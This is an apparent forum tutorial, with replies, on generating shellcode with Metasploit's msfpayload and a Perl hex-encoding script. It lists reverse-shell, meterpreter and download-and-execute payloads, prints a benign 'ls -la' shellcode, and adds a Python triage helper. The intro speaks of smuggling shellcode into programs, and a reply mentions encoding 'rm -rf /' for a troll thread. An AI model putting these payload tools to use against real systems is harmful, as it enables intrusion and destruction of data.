Creating shellcode (Two ways)
  • Decided to write up a very simple guide on creating (NOT writing) shellcode. Just so you guys know how to create some next time you wanna smuggle some shellcode into a program or something.


    Method 1:
    The first method of creating shellcode is using msfpayload, which comes with Metasploit. This is a very useful program that can generate shellcode in a couple of different languages (including C, Perl and Ruby). Now this works on Windows and *nix, but I'm assuming you're running *nix in this. First, cd to
    /opt/metasploit3/bin

    Then type this:
    ./msfpayload <payload> <options> <language>

    Now for the payload, you can see them all using the -h option. Here is a list of them:
    [spoiler]

    Usage: /opt/metasploit3/msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar>

    Framework Payloads (216 total)
    ==============================

    Name Description
    ---- -----------
    aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port Spawn a shell on an established connection
    aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
    bsd/x86/exec Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port Spawn a shell on an established connection
    bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic Executes the supplied command
    cmd/unix/interact Interacts with a shell on an established socket connection
    cmd/unix/reverse Creates an interactive shell through two inbound connections
    cmd/unix/reverse_bash
    Creates an interactive shell via bash's builtin /dev/tcp.
    This will not work on most Debian-based Linux distributions
    (including Ubuntu) because they compile bash without the
    /dev/tcp feature.

    cmd/unix/reverse_netcat Creates an interactive shell via netcat
    cmd/unix/reverse_perl Creates an interactive shell via perl
    cmd/unix/reverse_ruby Connect back and create a command shell via Ruby
    cmd/windows/adduser Create a new user and add them to local administration group
    cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
    cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it
    cmd/windows/reverse_perl Creates an interactive shell via perl
    cmd/windows/reverse_ruby Connect back and create a command shell via Ruby
    generic/debug_trap Generate a debug trap in the target process
    generic/shell_bind_tcp Listen for a connection and spawn a command shell
    generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
    generic/tight_loop Generate a tight loop in the target process
    java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in Java
    java/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server in Java
    java/shell/bind_tcp Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    java/shell/reverse_tcp Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    linux/armle/exec Execute an arbitrary command
    linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
    linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell
    linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell
    linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
    linux/ppc/shell_find_port Spawn a shell on an established connection
    linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
    linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell
    linux/ppc64/shell_find_port Spawn a shell on an established connection
    linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell
    linux/x86/adduser Create a new user with UID 0
    linux/x86/chmod Runs chmod on specified file with specified mode
    linux/x86/exec Execute an arbitrary command
    linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server
    linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server
    linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server
    linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server
    linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server
    linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
    linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
    linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged)
    linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
    linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
    linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged)
    linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
    linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
    linux/x86/shell_find_port Spawn a shell on an established connection
    linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell
    netware/shell/reverse_tcp Connect back to the attacker, Connect to the NetWare console (staged)
    osx/armle/execute/bind_tcp Listen for a connection, Spawn a command shell (staged)
    osx/armle/execute/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
    osx/armle/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
    osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
    osx/armle/vibrate
    Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.
    Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.

    osx/ppc/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
    osx/ppc/shell/find_tag Use an established connection, Spawn a command shell (staged)
    osx/ppc/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
    osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
    osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
    osx/x86/bundleinject/bind_tcp Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/bundleinject/reverse_tcp Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/exec Execute an arbitrary command
    osx/x86/isight/bind_tcp Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/isight/reverse_tcp Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell
    osx/x86/shell_find_port Spawn a shell on an established connection
    osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
    osx/x86/vforkshell/bind_tcp Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell/reverse_tcp Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell
    osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell
    php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_php Listen for a connection and spawn a command shell via php
    php/download_exec Download an EXE from an HTTP URL and execute it
    php/exec Execute a single system command
    php/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl Creates an interactive shell via perl
    php/reverse_php Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock
    Spawn a shell on the established connection to
    the webserver. Unfortunately, this payload
    can leave conspicuous evil-looking entries in the
    apache error logs, so it is probably a good idea
    to use a bind or reverse shell unless firewalls
    prevent them from working. The issue this
    payload takes advantage of (CLOEXEC flag not set
    on sockets) appears to have been patched on the
    Ubuntu version of Apache and may not work on
    other Debian-based distributions. Only tested on
    Apache but it might work on other web servers
    that leak file descriptors to child processes.

    solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
    solaris/sparc/shell_find_port Spawn a shell on an established connection
    solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
    solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell
    solaris/x86/shell_find_port Spawn a shell on an established connection
    solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
    tty/unix/interact Interacts with a TTY on an established socket connection
    windows/adduser Create a new user and add them to local administration group
    windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a Dll via a reflective loader
    windows/dllinject/bind_tcp Listen for a connection, Inject a Dll via a reflective loader
    windows/dllinject/find_tag Use an established connection, Inject a Dll via a reflective loader
    windows/dllinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a Dll via a reflective loader
    windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a Dll via a reflective loader
    windows/download_exec Download an EXE from an HTTP URL and execute it
    windows/exec Execute an arbitrary command
    windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
    windows/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/find_tag Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_http Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_https Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
    windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
    windows/patchupdllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_tcp Listen for a connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/find_tag Use an established connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ord_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_dns Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupmeterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/find_tag Use an established connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a piped command shell (staged)
    windows/shell/bind_nonx_tcp Listen for a connection (No NX), Spawn a piped command shell (staged)
    windows/shell/bind_tcp Listen for a connection, Spawn a piped command shell (staged)
    windows/shell/find_tag Use an established connection, Spawn a piped command shell (staged)
    windows/shell/reverse_http Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged)
    windows/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
    windows/shell/reverse_nonx_tcp Connect back to the attacker (No NX), Spawn a piped command shell (staged)
    windows/shell/reverse_ord_tcp Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell_bind_tcp Listen for a connection and spawn a command shell
    windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell
    windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
    windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API
    windows/upexec/bind_ipv6_tcp Listen for a connection over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/bind_nonx_tcp Listen for a connection (No NX), Uploads an executable and runs it (staged)
    windows/upexec/bind_tcp Listen for a connection, Uploads an executable and runs it (staged)
    windows/upexec/find_tag Use an established connection, Uploads an executable and runs it (staged)
    windows/upexec/reverse_http Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_ipv6_tcp Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_nonx_tcp Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
    windows/upexec/reverse_ord_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_dns Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/vncinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_nonx_tcp Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_tcp Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/find_tag Use an established connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_http Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ord_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/x64/exec Execute an arbitrary command (Windows x64)
    windows/x64/meterpreter/bind_tcp Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/meterpreter/reverse_tcp Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_tcp Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
    windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)

    [/spoiler]
    As you can see, there are a lot of payloads that can be used. In this tutorial we will be using
    linux/x86/exec

    This will simply execute a command. For the language we will use C. So here is an example:
    ./msfpayload linux/x86/exec CMD="ls -la" C

    This is the output we will get:
    /*
     * linux/x86/exec - 42 bytes
     * http://www.metasploit.com
     * PrependSetresuid=false, PrependSetreuid=false,
     * PrependSetuid=false, PrependChrootBreak=false,
     * AppendExit=false, CMD=ls -la
     */
    unsigned char buf[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x6c"
    "\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80";

    This particular shellcode is 42 bytes, and the header shows you the options that were set. So if we want to incorporate this in C code, you just copy that, and now the unsigned character array "buf" is the shellcode.
    NOTE: For use in Python, use the Ruby option (y); this should be compatible.


    Method two:
    This method is a bit less reliable and isn't as good. It's just for creating trivial shellcode that can be executed easily. Plus, it's easily decoded.
    This method uses a Perl script (not written by me). Here is the Perl code:

    #!/usr/bin/perl
    # shellcode generator: prints each byte of the typed string as a \xHH escape
    use strict;
    use warnings;

    print "shellcode: ";
    my $data = <STDIN>;
    chomp($data);

    # split(//, ...) breaks the string into single characters
    # (the original used split(undef, ...), which only works by accident and warns)
    my @values = split(//, $data);

    foreach my $val (@values) {
        print '\x';                 # single quotes: a literal backslash followed by x
        print unpack("H2", $val);   # the byte as two hex digits (quoted, so it works under strict)
    }

    print "\n";
    exit 0;

    Just paste this into a .pl file and type this:
    perl shellcode.pl

    Now just type what you want (in this case, /bin/sh), and you will get the shellcode. Example:

    chronic@vandal:~$ perl shellcode.pl
    shellcode: /bin/sh
    \x2f\x62\x69\x6e\x2f\x73\x68
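An added Python example (mine, not from the post and not Metasploit's own code) that reads the msfpayload C dump quoted above, checks the byte count against the header comment, lists NUL-byte offsets and printable strings (the triage you would do before trusting a pasted blob), and also does the byte-to-\x conversion the Perl script in method two performs. The sample input is the dump from the post embedded inline; the function names are my own.

```python
import re

# Constructed sample input: the msfpayload C output quoted in the post.
MSFPAYLOAD_C_OUTPUT = r'''/*
 * linux/x86/exec - 42 bytes
 * http://www.metasploit.com
 * PrependSetresuid=false, PrependSetreuid=false,
 * PrependSetuid=false, PrependChrootBreak=false,
 * AppendExit=false, CMD=ls -la
 */
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x6c"
"\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80";
'''


def declared_length(text):
    """Byte count stated in the '* <payload> - N bytes' header line, or None."""
    m = re.search(r'^\s*\*\s*\S+\s+-\s+(\d+)\s+bytes', text, re.M)
    return int(m.group(1)) if m else None


def parse_c_array(text):
    """Decode the adjacent "\\xHH" string literals of the buf[] initializer.

    Only \\xHH escapes are accepted; anything else inside a literal raises,
    so a mangled paste fails loudly instead of yielding a shorter buffer.
    """
    m = re.search(r'unsigned\s+char\s+\w+\[\]\s*=\s*((?:"[^"]*"\s*)+);', text)
    if not m:
        raise ValueError("no 'unsigned char name[] = \"...\";' initializer found")
    out = bytearray()
    for literal in re.findall(r'"([^"]*)"', m.group(1)):
        if not re.fullmatch(r'(\\x[0-9a-fA-F]{2})*', literal):
            raise ValueError("unexpected content in literal: %r" % literal)
        out.extend(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', literal))
    return bytes(out)


def nul_offsets(code):
    """Offsets of 0x00 bytes. A buffer containing any cannot survive a
    strcpy-style copy, so "just copy buf" only works while the bytes are
    handled as a sized array, never as a C string."""
    return [i for i, b in enumerate(code) if b == 0]


def printable_strings(code, min_len=4):
    """Runs of printable ASCII, the strings(1)-style view of a blob."""
    return [s.decode('ascii') for s in re.findall(rb'[\x20-\x7e]{%d,}' % min_len, code)]


def to_c_escapes(data):
    """The transform the post's Perl script performs: every byte as \\xHH."""
    return ''.join('\\x%02x' % b for b in data)


def inspect_msfpayload_c(text):
    """Summarize an msfpayload C dump: declared vs actual size, NULs, strings."""
    code = parse_c_array(text)
    return {
        'declared_bytes': declared_length(text),
        'actual_bytes': len(code),
        'nul_offsets': nul_offsets(code),
        'strings': printable_strings(code),
    }


if __name__ == '__main__':
    for key, value in inspect_msfpayload_c(MSFPAYLOAD_C_OUTPUT).items():
        print('%-15s %s' % (key, value))
    print(to_c_escapes(b'/bin/sh'))
```

The strings list shows the embedded "/bin", "/sh" and "ls -la" pieces (plus the usual junk runs that happen to be printable), which is how you confirm what a pasted blob actually runs before using it.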
  • Sh3llc0d3
    Posts: 1,910
    I saw the Perl shellcode gen a while back and I'd rather stick with the Metasploit method :)
  • said:
    I saw the Perl shellcode gen a while back and I'd rather stick with the Metasploit method :)

    Yeah, the Perl shellcode kinda sucks. It's technically not even shellcode lol. It's great for encoding things though, like what I did in the troll thread encoding the rm -rf /
  • Sh3llc0d3
    Posts: 1,910
    Yeah, it has its uses ;)